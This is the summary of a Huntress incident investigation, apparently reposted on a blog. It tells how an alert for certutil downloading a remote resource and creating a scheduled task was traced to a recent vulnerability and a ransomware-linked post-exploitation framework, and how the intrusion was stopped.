Investigating Intrusions From Intriguing Exploits

Summary

On 02 February 2023, an alert triggered in a Huntress-protected environment. At first glance, the alert itself was fairly generic – a combination of certutil using the urlcache flag to retrieve a remote resource and follow-on scheduled task creation – but further analysis revealed a more interesting set of circumstances. By investigating the event in question and pursuing root cause analysis (RCA), Huntress was able to link this intrusion to a recently-announced vulnerability as well as to a long-running post-exploitation framework linked to prominent ransomware groups. As a result of a combination of quick initial triage and action with deeper investigation, Huntress was able to mitigate and prevent an intrusion likely leading to a disruptive ransomware incident.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Generated by Feedzy